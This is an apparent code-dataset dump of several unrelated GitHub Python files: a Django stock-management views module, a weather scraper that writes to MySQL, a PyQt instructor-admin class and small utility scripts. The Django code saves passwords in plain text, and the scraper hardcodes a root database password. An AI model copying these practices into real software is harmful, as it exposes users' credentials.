int(i.total_amount)\n return render(request,'sales list.html',{'v':ob,'v1':ob1,'c':tob,'tot':tot,'m':mob})\ndef send_fb(request):\n return render(request, 'sendfeedback.html')\ndef shop_hom(request):\n ob = shop_registration.objects.get(lid__id=request.session['lid'])\n request.session['sname'] = ob.name\n import numpy as np\n from django.db.models import Avg,Sum\n ob = order.objects.filter(sid__lid__id=request.session['lid']).values('pid__name', 'pid__did__name',\n 'pid__price').order_by('pid__id').annotate(sum=Sum('stock'))\n print(ob, \"========\")\n # obb = restaurant.objects.values('rname').annotate(rtg=Avg('rating')).order_by('-rating')\n c = []\n s = []\n for i in ob:\n c.append(i['pid__name'])\n s.append(float(i['sum']))\n print(c)\n print(s)\n return render(request, 'graph.html', {'v': ob, 'c': c, 's': s})\n # return render(request, 'shop home page.html')\ndef shop_reg(request):\n return render(request, 'reg shop index.html')\ndef shpownr(request):\n name = request.POST['textfield']\n location = request.POST['textfield2']\n email = request.POST['textfield3']\n mobile = request.POST['textfield4']\n username = request.POST['textfield5']\n password = request.POST['textfield6']\n image = request.FILES['file']\n fn = FileSystemStorage()\n fs = fn.save(image.name, image)\n ob = login()\n ob.username = username\n ob.password = password\n ob.type = 'pending'\n ob.save()\n iob = shop_registration()\n iob.name = name\n iob.location = location\n iob.email = email\n iob.mobile_number = mobile\n iob.lid = ob\n iob.image = fs\n iob.save()\n return HttpResponse('''''')\n\ndef acceptshop(request,id):\n ob=login.objects.get(id=id)\n ob.type='shopowner'\n ob.save()\n return HttpResponse('''''')\ndef rejectshop(request,id):\n ob=login.objects.get(id=id)\n ob.type='reject'\n ob.save()\n return HttpResponse('''''')\ndef shop_add_prd(request):\n ob = shop_product.objects.all()\n return render(request, 'shop add product.html',{'val':ob})\ndef shop_prd(request):\n Product_Name = 
request.POST['textfield']\n Category = request.POST['select']\n Quantity = request.POST['textfield2']\n Tax = request.POST['textfield3']\n MRP = request.POST['textfield4']\n image = request.FILES['file']\n fn = FileSystemStorage()\n fs = fn.save(image.name,image)\n iob = shop_product()\n iob.name=Product_Name\n iob.category=Category\n iob.quantity=Quantity\n iob.Tax=Tax\n iob.MRP=MRP\n iob.image=fs\n iob.save()\n return HttpResponse('''''')\ndef shop_list(request):\n from django.db.models import Count\n ob=order.objects.filter(orderstatus='accept',pid__did__lid__id=request.session['lid']).values('sid__name','sid__location','sid__mobile_number','sid__email').annotate(dcount=Count('sid')).order_by()\n print(ob,\"==============\")\n return render(request, 'shoplist view.html',{'val':ob})\ndef view_dis(request):\n ob=dis_registration.objects.all()\n return render(request, 'view distributor list.html',{'val':ob})\ndef block_or_unblock_dis(request):\n ob=dis_registration.objects.all()\n return render(request, 'unblock distributor.html',{'val':ob})\ndef block(request,id):\n ob=login.objects.get(id=id)\n ob.type='block'\n ob.save()\n return HttpResponse('''''')\n\ndef unblock(request,id):\n ob=login.objects.get(id=id)\n ob.type='distributor'\n ob.save()\n return HttpResponse('''''')\ndef view_shop(request):\n ob=shop_registration.objects.all()\n return render(request, 'view shop list.html',{'val':ob})\ndef block_or_unblock_shop(request):\n ob=shop_registration.objects.all()\n return render(request, 'block shop.html',{'val':ob})\ndef blockshop(request,id):\n ob=login.objects.get(id=id)\n ob.type='block'\n ob.save()\n return HttpResponse('''''')\ndef unblockshop(request,id):\n ob=login.objects.get(id=id)\n ob.type='shopowner'\n ob.save()\n return HttpResponse('''''')\ndef rpt(request):\n today = datetime.today()\n ob = order.objects.filter(orderstatus='accept',date=datetime.today(), pid__did__lid__id=request.session['lid']).count()\n ob1 = order.objects.filter(orderstatus='accept',pid__did__lid__id=request.session['lid'], date__month=today.month,\n date__year=today.year).count()\n print(ob, \"============\")\n tob = order.objects.filter(orderstatus='accept',pid__did__lid__id=request.session['lid'], date__year=today.year).count()\n a = order.objects.filter(orderstatus='accept',pid__did__lid__id=request.session['lid'], date=datetime.today())\n tot = 0\n for i in a:\n tot = tot + int(i.stock)*int(i.pid.price)\n print(tot, \"***************\")\n s = order.objects.filter(orderstatus='accept',pid__did__lid__id=request.session['lid'], date__month=today.month, date__year=today.year)\n mob = 0\n for i in s:\n mob = mob +int(i.stock)*int(i.pid.price)\n return render(request, 'sales list2.html', {'v': ob, 'v1': ob1, 'c': tob, 'tot': tot, 'm': mob})\ndef shoprpt(request):\n today = datetime.today()\n ob1 = bill.objects.filter(sid__lid__id=request.session['lid'], date__month=today.month,\n date__year=today.year).count()\n print(ob1, \"============\")\n s = bill.objects.filter(sid__lid__id=request.session['lid'],date__month=today.month,date__year=today.year)\n mob = 0\n for i in s:\n mob = mob + int(i.total_amount)\n from django.db.models import Subquery,OuterRef,Count\n # annotation={'AcSum':count('pid')}\n # pd=billdetails.objects.filter(bid__date__month=today.month,bid__date__year=today.year).values('pid').annotate(**annotation).order_by('-AcSum').values('AcSum')[:1]\n 
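The sale_list and rpt views above compute revenue by looping over querysets in Python. The database can do the summing instead; a sketch, assuming total_amount (stored as text in this schema) can be cast to an integer:

```python
from django.db.models import IntegerField, Sum
from django.db.models.functions import Cast

def month_revenue(shop_lid, year, month):
    qs = bill.objects.filter(sid__lid__id=shop_lid,
                             date__year=year, date__month=month)
    # Cast the text column so the SUM happens in SQL, not in Python
    agg = qs.aggregate(total=Sum(Cast('total_amount', IntegerField())))
    return agg['total'] or 0
```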
pd=billdetails.objects.filter(bid__date__month=today.month,bid__date__year=today.year).values('pid__pid__name','pid__pid__image').annotate(count=Count('pid'))\n try:\n pd=pd.latest('count')\n print(pd,\"*************************\")\n except:\n return render(request, 'shopreport.html',\n {'v': ob1, 'm': mob, 'pd': 0, 'cnt': 0, 'im': 0})\n return render(request, 'shopreport.html',{'v':ob1,'m':mob,'pd':pd['pid__pid__name'],'cnt':pd['count'],'im':pd['pid__pid__image']})\ndef viewodr(request):\n ob=order.objects.filter(pid__did__lid__id=request.session['lid'])\n return render(request, 'vieworders.html',{'val':ob})\ndef paymnt_1(request,id):\n request.session['oid']=id\n ob=order.objects.get(id=id)\n total=int(ob.stock)*int(ob.pid.price)\n disnt=int(ob.pid.MRP)-int(ob.pid.price)\n gtot = int(total) * int(ob.pid.cid.GST) / 100\n famt = int(total) + int(gtot)\n if int(famt) <= int(ob.amt):\n ck=1\n else:\n ck=0\n print(ck,\"============================\")\n damt=int(famt)-int(ob.amt)\n return render(request, 'paymnt1.html',{'val':ck ,'tot':int(total),'d':disnt,'gtot':famt,'gst':ob.pid.cid.GST,'pamt':ob.amt,'damt':damt})\ndef paymnt_2(request):\n amt=request.POST['amt1']\n oid=request.session['oid']\n ob=order.objects.get(id=oid)\n ob.amt=int(ob.amt)+int(amt)\n ob.save()\n total=int(ob.stock)*int(ob.pid.price)\n disnt=int(ob.pid.MRP)-int(ob.pid.price)\n gtot = int(total) * int(ob.pid.cid.GST) / 100\n famt = int(total) + int(gtot)\n if int(famt) <= int(ob.amt):\n ck=1\n else:\n ck=0\n print(ck,\"============================\")\n damt=int(famt)-int(ob.amt)\n return render(request, 'paymnt1.html',{'val':ck ,'tot':int(total),'d':disnt,'gtot':famt,'gst':ob.pid.cid.GST,'pamt':ob.amt,'damt':damt})\n\ndef acceptorder(request,id):\n ob=order.objects.get(id=id)\n ob.orderstatus='accept'\n ob.save()\n ob1=product.objects.get(id=ob.pid.id)\n ob1.stock=int(ob1.stock)-int(ob.stock)\n ob1.save()\n return HttpResponse('''''')\ndef rejectorder(request,id):\n ob=order.objects.get(id=id)\n ob.orderstatus='reject'\n ob.save()\n return HttpResponse('''''')\ndef aprv(request,id):\n ob=order.objects.get(id=id)\n ob.orderstatus='returned'\n ob.save()\n return HttpResponse('''''')\ndef rjt(request,id):\n ob=order.objects.get(id=id)\n ob.orderstatus='rejected'\n ob.save()\n return HttpResponse('''''')\n# Create your views here.\n\n", "repo_name": "soorya411/Stock-Management-System", "sub_path": "stock_management_system/sms/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 27658, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.shortcuts.render", "line_number": 8, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 10, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 12, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 19, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 22, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 25, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 27, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 29, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 34, "usage_type": "call"}, {"api_name": "django.core.files.storage.FileSystemStorage", "line_number": 43, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 53, "usage_type": 
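The total/GST recomputation inside order_info appears twice almost verbatim. A sketch of the shared helper both branches could call; the names mirror the models used above, and summing GST rates across distinct categories copies the original's tax logic rather than fixing it:

```python
def bill_totals(bill_id):
    items = billdetails.objects.filter(bid__id=bill_id)
    # Line totals at MRP, as in order_info
    total = sum(int(i.quantity) * int(i.pid.pid.MRP) for i in items)
    # One GST rate per distinct category on the bill, added together
    cat_ids = items.values_list('pid__pid__cid', flat=True).distinct()
    gst = sum(int(category.objects.get(id=cid).GST) for cid in cat_ids)
    grand_total = total + total * gst / 100
    return total, gst, grand_total
```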
"call"}, {"api_name": "django.http.HttpResponse", "line_number": 68, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 73, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 76, "usage_type": "call"}, {"api_name": "django.core.files.storage.FileSystemStorage", "line_number": 85, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 97, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 99, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 109, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 112, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 117, "usage_type": "call"}, {"api_name": "django.core.files.storage.FileSystemStorage", "line_number": 126, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 141, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 147, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 153, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 156, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 159, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 162, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 165, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 168, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 171, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 179, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 179, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 182, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 186, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 190, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 194, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 198, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 198, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 202, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 205, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 209, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 214, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 218, "usage_type": "call"}, {"api_name": "django.db.models.Max", "line_number": 227, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 233, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 233, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 242, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 250, "usage_type": "call"}, {"api_name": "django.db.models.Max", "line_number": 252, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 260, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 260, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 292, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 323, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", 
"line_number": 325, "usage_type": "call"}, {"api_name": "razorpay.Client", "line_number": 332, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 335, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 337, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 342, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 345, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 366, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 366, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 373, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 375, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 377, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 384, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 389, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 392, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 395, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 397, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 402, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 408, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 411, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 414, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 419, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 424, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 426, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 426, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 427, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 427, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 431, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 431, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 440, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 442, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 449, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 459, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 462, "usage_type": "call"}, {"api_name": "django.core.files.storage.FileSystemStorage", "line_number": 471, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 486, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 492, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 497, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 500, "usage_type": "call"}, {"api_name": "django.core.files.storage.FileSystemStorage", "line_number": 508, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 518, "usage_type": "call"}, {"api_name": "django.db.models.Count", "line_number": 521, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 523, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 526, "usage_type": "call"}, {"api_name": 
"django.shortcuts.render", "line_number": 529, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 534, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 540, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 543, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 546, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 551, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 556, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 558, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 558, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 559, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 559, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 564, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 564, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 573, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 575, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 575, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 586, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 591, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 593, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 596, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 610, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 627, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 636, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 641, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 646, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 651, "usage_type": "call"}]} +{"seq_id": "27144411912", "text": "import requests\nfrom bs4 import BeautifulSoup\nimport pymysql\n\nconn = pymysql.connect(user='root', password='123456', host='localhost', database='new', port=3306, charset='utf8')\ncursor = conn.cursor()\n\n\ndef get_page(url):\n try:\n headers = {\n 'user-agent': 'Mozilla/5.0'\n }\n response = requests.get(url=url, headers=headers)\n response.raise_for_status()\n response.encoding = response.apparent_encoding\n return response.text # 以字符串的形式来返回了网页的源码\n except:\n return 'error'\n\n\ndef parse_page(html, city_name):\n soup = BeautifulSoup(html, 'lxml')\n \"\"\"\n 时间实况 -> time\n 温度 -> tem\n 相对湿度 -> zs h\n 风向级数 -> zs w\n 空气质量 -> zs pool\n \"\"\"\n\n data = soup.find(class_=\"curve_livezs\") # curve_livezs\n time = data.find(class_='time')\n\n\n wea = soup.find_all(class_=\"wea\")[0].text.strip()\n # print(\"天气概况:\", wea)\n tem = soup.find_all(class_=\"tem\")[0].text.strip()\n # print(\"当前温度:\", tem)\n win = soup.find_all(class_=\"win\")[0].span['title'].strip()\n # print(\"风向:\", win)\n leve1 = soup.find_all(class_=\"win\")[0].i.text.strip()\n # print(\"风力:\", leve1)\n # print(\"当前时间是:\", time.asctime())\n time1 = time.asctime()\n\n # time = soup.find('div', class_='sk mySkyNull').find('p', class_='time').find('span').get_text()\n\n # tem1 = soup.find('div', 'sk mySkyNull').find('div', 'tem').find('span').get_text()\n # tem2 = soup.find('div', 'sk 
mySkyNull').find('div', 'tem').find('span').get_text()\n # tem2 = soup.find('div', 'sk mySkyNull').find('div', 'tem').find('em').get_text()\n # tem = tem1 + tem2\n #\n # zs_h1 = soup.find('div', 'sk mySkyNull').find('div', 'zs h').find('span').get_text()\n # zs_h2 = soup.find('div', 'sk mySkyNull').find('div', 'zs h').find('em').get_text()\n # zs_h = zs_h1 + zs_h2\n #\n # zs_w1 = soup.find('div', 'sk mySkyNull').find('div', 'zs w').find('span').get_text()\n # zs_w2 = soup.find('div', 'sk mySkyNull').find('p', 'zs w').find('em').get_text()\n # zs_w = zs_w1 + zs_w2\n #\n # zs_pool = soup.find('div', 'sk mySkyNull').find('div', 'zs pool').find('span').find('a').get_text()\n\n # sql = \"INSERT INTO test1(城市,时间实况, 温度,相对湿度,风向级数,空气质量) VALUES ('%s','%s', '%s', '%s', '%s', '%s')\" % (\n #     city_name, time1, tem, zs_h, zs_w, zs_pool)\n\n # FIX: 'date' was undefined in the original; record today's date via the time module imported above\n date = time.strftime('%Y-%m-%d')\n sql = \"INSERT INTO test2(城市,日期,时间实况, 当前温度,天气概况,风向,风力) VALUES (%s, %s, %s, %s, %s, %s, %s)\"\n\n try:\n # parameterized execute lets the driver quote values and avoids SQL injection\n cursor.execute(sql, (city_name, date, time1, tem, wea, win, leve1))\n conn.commit()\n except Exception as e:\n print(e)\n conn.rollback()\n\n\ndef main():\n files = open('city_list_pre7.txt', 'r', encoding='utf-8')\n city_name_id = files.readlines()\n\n try:\n for line in city_name_id:\n city_name = line.split('-')[0].replace(\"\\n\", \"\")\n city_id = line.split('-')[1].replace(\"\\n\", \"\")\n\n url = 'http://www.weather.com.cn/weather1d/' + city_id + '.shtml'\n\n html = get_page(url)\n\n # print(html) # dump the whole page for inspection\n\n parse_page(html, city_name)\n files.close()\n except:\n print(\"error\")\n\n\nif __name__ == '__main__':\n main()\n print('success')", "repo_name": "ZhouYao0627/Python_Spider", "sub_path": "Weather/05_weather.py", "file_name": "05_weather.py", "file_ext": "py", "file_size_in_byte": 3296, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pymysql.connect", "line_number": 5, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 14, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "33907384040", "text": "import json\na = {\n \"firstName\": \"Jane\",\n \"lastName\": \"Doe\",\n \"hobbies\": [\"running\", \"sky diving\", \"singing\"],\n \"age\": 35,\n \"children\": [\n {\n \"firstName\": \"Alice\",\n \"age\": 6\n },\n {\n \"firstName\": \"Bob\",\n \"age\": 8\n }\n ]\n}\n\njson_file = \"my_file.json\"\n\nwith open(json_file, 'w') as file_obj:\n json.dump(a, file_obj)\n\n", "repo_name": "benie-leroy/DI-learning", "sub_path": "Di_execises/week_5/day_4/index.py", "file_name": "index.py", "file_ext": "py", "file_size_in_byte": 405, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.dump", "line_number": 22, "usage_type": "call"}]} +{"seq_id": "16744355608", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 12 11:29:21 2020\n\n@author: Kinjal Dand\n\nCommonly used python functions\n\n\"\"\"\n\nfrom PIL import Image\nimport numpy as np\nimport os\nimport cv2\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nDATA_FOLDER = os.path.join(BASE_DIR,\"Data\")\n\ndef get_file_extension(img_path):\n filename, file_extension = os.path.splitext(img_path)\n return filename, file_extension\n\ndef get_filename_from_path(dest_path):\n return os.path.basename(dest_path)\n\ndef get_file_size(file_name):\n file_path = get_image_path(file_name)\n size_bytes = os.path.getsize(file_path)\n #print(file_path,size_bytes)\n return size_bytes\n\ndef get_image_path(image_name):\n if 
image_name.startswith(DATA_FOLDER) == False:\n return os.path.join(DATA_FOLDER,image_name)\n else:\n return image_name\n \ndef handle_path(image_name,append_text=\"\"):\n dest_path = get_image_path(image_name)\n append_text = str(append_text)\n if append_text.strip()!=\"\":\n filename, file_extension = get_file_extension(dest_path)\n \n if append_text.startswith('_')==False:\n append_text = \"_\" +append_text\n dest_path = filename + append_text + file_extension\n return dest_path\n \ndef save_img(img,image_name,append_text=\"\"):\n dest_path = handle_path(image_name,append_text)\n if isinstance(img,np.ndarray):\n cv2.imwrite(dest_path,img)\n else:\n #img = img.astype(np.uint8)\n #img = Image.fromarray(img)\n img.save(dest_path)\n return get_filename_from_path(dest_path)\n \n\n \ndef get_image_as_array(image_name):\n file_path = get_image_path(image_name)\n img = Image.open(file_path)\n pix = np.array(img)\n #print(type(img)) #\n #print(type(pix)) #\n return pix\n \ndef get_image_as_cv2(image_name):\n file_path = get_image_path(image_name)\n img = cv2.imread(file_path)\n #print(type(img)) #\n return img\n \n \n", "repo_name": "kinjaldand/ImageProcessing", "sub_path": "MyUtils.py", "file_name": "MyUtils.py", "file_ext": "py", "file_size_in_byte": 2030, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.dirname", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path.getsize", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 51, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 52, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 63, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 63, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 64, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "44249963197", "text": "import sys, os\n\nfrom PyQt5.QtCore import QObject, pyqtSignal as Signal, pyqtSlot as Slot\n\nfrom classes import database, imgto\n\nclass instructor(QObject):\n def __init__(self):\n QObject.__init__(self)\n self.fromDB = database.database()\n self.get_img = imgto.database()\n self.sqlString = None\n self.sqlData = None\n self.sqlList = None\n\n displaySignal = Signal(str, str)\n displaySignal2 = Signal(int, int)\n @Slot()\n def display(self):\n self.sqlString = \"SELECT name, id_school, id FROM accounts WHERE type = 'instructor'\"\n self.sqlList = self.fromDB.selectall(self.sqlString)\n count = 0\n for x in self.sqlList:\n self.displaySignal.emit(x[0], x[1])\n self.displaySignal2.emit(count, x[2])\n\n count += 1\n \n @Slot(str, str, result=bool)\n 
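The instructor class above emits displaySignal and displaySignal2, but nothing in this file shows them being consumed. A minimal sketch of wiring the signals from plain Python; the print slots are placeholders for real UI handlers:

```python
inst = instructor()
# Direct (synchronous) connections: display() will invoke these immediately
inst.displaySignal.connect(lambda name, school_id: print(name, school_id))
inst.displaySignal2.connect(lambda row, account_id: print(row, account_id))
inst.display()  # emits one pair of signals per instructor row in the database
```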
def addInstructor(self, school_id, name):\n try:\n school_id = str(int(school_id))\n self.sqlString = \"INSERT INTO accounts (id_school, name, type) VALUES (%s, %s, 'instructor')\"\n self.sqlData = (school_id, name.title())\n self.fromDB.setValues(self.sqlString, self.sqlData)\n\n self.sqlString = \"INSERT INTO instructorinfo (id) VALUES ((SELECT id FROM accounts WHERE id_school = %s))\"\n self.sqlData = (school_id,)\n self.fromDB.setValues(self.sqlString, self.sqlData)\n\n self.sqlString = \"INSERT INTO accountimg (id, img) VALUES ((SELECT id FROM accounts WHERE id_school = %s), %s)\"\n with open(os.path.join(os.getcwd(), \"img/favicon.png\"), \"rb\") as img:\n binary_data = img.read()\n self.sqlData = (school_id, binary_data)\n self.fromDB.setValues(self.sqlString, self.sqlData)\n\n self.sqlString = \"SELECT id FROM accounts WHERE id_school = %s\"\n self.sqlData = (school_id,)\n self.sqlList = self.fromDB.selectone(self.sqlString, self.sqlData)[0]\n self.get_img.getimg(self.sqlList)\n\n return True \n\n except:\n return False\n\n @Slot(str, result=bool)\n def removeInstructor(self, id):\n try:\n self.sqlString = \"DELETE FROM accounts WHERE id = %s\"\n self.sqlData = (id,)\n self.fromDB.setValues(self.sqlString, self.sqlData)\n \n self.sqlString = \"DELETE FROM accountimg WHERE id = %s\"\n self.sqlData = (id,)\n self.fromDB.setValues(self.sqlString, self.sqlData)\n\n return True \n \n except:\n return False\n\n @Slot(str, str, str, result=bool)\n def editInstructor(self, id, school_id, name):\n try:\n school_id = str(int(school_id))\n self.sqlString = \"UPDATE accounts a JOIN instructorinfo i ON a.id = i.id SET id_school = %s, name = %s WHERE a.id = %s\"\n self.sqlData = (school_id, name, id)\n self.fromDB.setValues (self.sqlString, self.sqlData)\n\n return True \n \n except:\n return False\n", "repo_name": "shanpadayhag/queuing_system", "sub_path": "classes/adminFunctions/instructor.py", "file_name": "instructor.py", "file_ext": "py", "file_size_in_byte": 3051, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "PyQt5.QtCore.QObject", "line_number": 7, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QObject.__init__", "line_number": 9, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QObject", "line_number": 9, "usage_type": "name"}, {"api_name": "classes.database.database", "line_number": 10, "usage_type": "call"}, {"api_name": "classes.database", "line_number": 10, "usage_type": "name"}, {"api_name": "classes.imgto.database", "line_number": 11, "usage_type": "call"}, {"api_name": "classes.imgto", "line_number": 11, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 16, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 17, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 42, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 29, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 57, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 73, "usage_type": "call"}]} +{"seq_id": "12568270394", "text": "# rabbitmq.py\n\nfrom 